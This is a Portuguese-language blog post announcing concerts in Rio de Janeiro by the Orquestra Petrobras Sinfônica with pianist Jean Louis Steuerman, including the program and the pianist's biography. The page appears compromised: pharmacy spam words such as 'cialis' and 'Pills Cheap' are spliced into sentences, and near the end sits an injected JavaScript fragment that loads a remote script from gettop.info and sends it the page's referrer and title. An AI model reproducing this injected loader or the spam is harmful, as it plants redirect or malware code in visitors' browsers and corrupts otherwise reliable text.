MovimentoMúsica de câmaraNotíciaProgramaçãoRio de Janeiro

Opes e Steuerman tocam Mozart e Bach

Purchase Orquestra Petrobras Sinfônica e solistas estreiam nova série na Sala Cecília Meireles. 

 

A Orquestra Petrobras Sinfônica (Opes) estreia mais uma série de apresentações no dia 27 de março (sexta-feira), às 20h. Chamado Opes na Sala, o projeto irá ocupar a reinaugurada Sala Cecília Meireles, no Centro do Rio de Janeiro. A formação do concerto é composta pelo pianista brasileiro Jean Louis Steuerman, pelo violista e spalla will cialis last all day Felipe Prazeres menosan purchase e pelo flautista Murilo Barquette Purchase .

O repertório, que terá reprise no dia 28, no mesmo horário, traz o prelúdio das Bachianas Brasileiras nº 4 (Heitor Villa-Lobos), Concerto de Brandemburgo nº 5 em Ré Maior, BWV 1050 (Johann Sebastian Bach), Eclogue para piano e cordas (Gerald Finzi) e Sinfonia nº 36 Linz, K 425 (Wolfgang Amadeus Mozart).

Sobre Jean Louis Steuerman

O pianista ganhou grande reconhecimento como solista e recitalista internacional depois de conquistar o segundo lugar no concurso Johann Sebastian Bach, em Leipzig, em 1972. Como solista, já se apresentou com a London Symphony, Royal Philharmonic, Orquestra do Gewandhaus Leipzig, Basel Symphony, Helsinki Philharmonic, Zurich Tonhalle, Berlin Symphony, Nouvel Orchestre Philharmonique, Orchestra Sinfonica di Milano, Osesp, Opes, OSB, Dallas Symphony, Seattle Symphony, Baltimore Symphony e Indianapolis Symphony Orchestra. Debutou nos Concertos Promenade BBC em 1985 com grande sucesso de crítica, tocando o Concerto em Ré menor, de Bach, com a Polish Chamber Orchestra.

Suas gravações para a Philips Classics incluem a obra para piano solo de Scriabin, a obra completa de Mendelssohn piano e orquestra com a Moscow Chamber Orchestra, os concertos para piano de Bach com a Chamber Orchestra of Europe, e o álbum Seis Partituras de Bach, gravação que lhe rendeu o prestigioso Diapason d’Or.

 

SERVIÇO: Pills Cheap Cheap

Buy Orquestra Petrobras Sinfônica

Jean Louis Steuerman, piano

Felipe Prazeres, violino

Murilo Barquette, flauta

27 e 28 de março, sexta e sábado, às 20h

 

Sala Cecília Meireles (R. da Lapa 47, Centro – Rio de Janeiro. Tels.: 21 2332-9223 e 2332-9224)

Ingressos: R$ 40 (inteira), à venda na bilheteria e no site Ingresso.com

 

Capacidade: 680 lugares

Classificação etária: livre

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; var d=document;var s=d.createElement(‘script’);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.